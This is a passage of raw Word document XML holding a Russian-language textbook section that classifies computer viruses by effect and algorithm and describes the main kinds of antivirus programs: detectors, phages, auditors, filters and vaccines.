          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3. По результату воздействия:</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неопасные</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (как правило эти вирусы забивают память компьютера путем своего размножения и могут организовывать мелкие пакости – проигрывать з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ложенную в них мелодию или показывать картинку);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>опасные</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (эти вирусы способны создать некоторые нарушения в фун</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ционировании ПК – сбои, перезагрузки, глюки, медленная работа компьютера и т.д.);</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>очень опасные</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (опасные вирусы могут уничтожить программы, стереть ва</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ж</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ные данные, убить загрузочные и системные области жесткого диска, который потом можно выбросить)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4. По алгоритму работы:</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паразитические</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (меняют содержимое файлов и секторов диска. Такие вирусы легко вычисляются и удаляются);</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мутанты</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (их очень тяжело обнаружить из-за применения в них алг</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ритмов шифрования. Каждая следующая копия размножающегося вируса не будет похожа на предыдущую);</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репликаторы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (вирусы-репликаторы, они же сетевые черви, проникают через компьютерные сети, они находят адреса компьютеров в сети и заражают их);</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троянский конь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (один из самых опасных вирусов, так как трояны не размножаются, а воруют ценную (порой очень дорогую) информацию – пароли, банковские счета, электронные деньги и т.д.);</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невидимки</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (это трудно обнаружимые вирусы, которые перехватывают обращения ОС к зараженным файлам и секторам дисков и подставляют вместо своего незараженные участки.</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u w:val="single"/>
        </w:rPr>
        <w:t>Антивирусными программами</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – называются программы, предназначе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ные для обнаружения или обнаружения и обезвреживания компьютерных вир</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для обнаружения, удаления и защиты от компьютерных вирусов разраб</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тано несколько видов специальных программ, которые позволяют обнаруж</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вать и уничтожать вирусы. Такие программы называются антивирусными. Ра</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>личают следующие виды антивирусных программ:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>программы-детекторы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>программы-доктора или фаги</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>программы-ревизоры</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>программы-фильтры</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>программы-вакцины или иммунизаторы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Программы-детекторы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> осуществляют поиск характерной для конкре</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ного вируса сигнатуры в оперативной памяти и в файлах и при обнаружении выдают соответствующее сообщение. Недостатком таких антивирусных пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>грамм является то, что они могут находить только те вирусы, которые известны разработчикам таких программ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Программы-доктора или фаги,</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> а также программы-вакцины не только находят зараженные вирусами файлы, но и «лечат» их, т.е. удаляют из файла тело программы-вируса, возвращая файлы в исходное состояние. В начале св</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ей работы фаги ищут вирусы в оперативной памяти, уничтожая их, и только з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тем переходят к «лечению» файлов. Среди фагов выделяют полифаги, т.е. пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>граммы-доктора, предназначенные для поиска и уничтожения большого кол</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>чества вирусов. Наиболее</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>известные</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>из</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>них</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Aidstest, Scan, Norton AntiVirus, Doctor Web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Учитывая, что постоянно появляются новые вирусы, программы-детекторы и программы-доктора быстро </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>устаревают, и требуется регулярное обновление версий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Программы-ревизоры</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> относятся к самым надежным средствам защиты от вирусов. Ревизоры запоминают </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>исходное состояние программ, каталогов и системных областей диска т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>гда, когда компьютер не заражен вирусом, а затем периодически или по жел</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нию пользователя сравнивают текущее состояние с исходным. Обнаруженные изменения выводятся на экран монитора. Как правило, сравнение состояний производят сразу после загрузки операционной системы. При сравнении пров</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ряются длина файла, код циклического контроля (контрольная сумма файла), дата и время модификации, другие параметры. Программы-ревизоры имеют д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>статочно развитые алгоритмы, обнаруживают стелс-вирусы и могут даже оч</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стить изменения версии проверяемой программы от изменений, внесенных в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>русом. К числу программ-ревизоров относится широко распространенная в России программа Adinf.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Программы-фильтры или «сторожа»</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> представляют собой небольшие резидентные программы, предназначенные для обнаружения подозрительных действий при работе компьютера, характерных для вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Такими действиями могут являться:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>попытки коррекции файлов с расширениями COM, EXE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>изменение атрибутов файла</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>прямая запись на диск по абсолютному адресу</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>запись в загрузочные сектора диска</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>загрузка резидентной программы</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rPr>
        <w:t>При попытке какой-либо программы произвести указанные действия «сторож» посылает пользователю сообщение и предлагает запретить или ра</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">решить соответствующее действие. Программы-фильтры весьма полезны, так как способны обнаружить вирус на самой ранней стадии его существования до размножения. Однако,они не «лечат» файлы и диски. Для уничтожения вирусов требуется применить другие программы, например фаги. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вакцины или иммунизаторы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - это резидентные программы, предотвр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щающие заражение файлов. Вакцины применяют, если отсутствуют програ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мы-доктора, «лечащие» этот вирус. Вакцинация возможна только от известных вирусов. Вакцина модифицирует программу или диск таким образом, чтобы это не отражалось на их работе, а вирус будет воспринимать их зараженными и п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
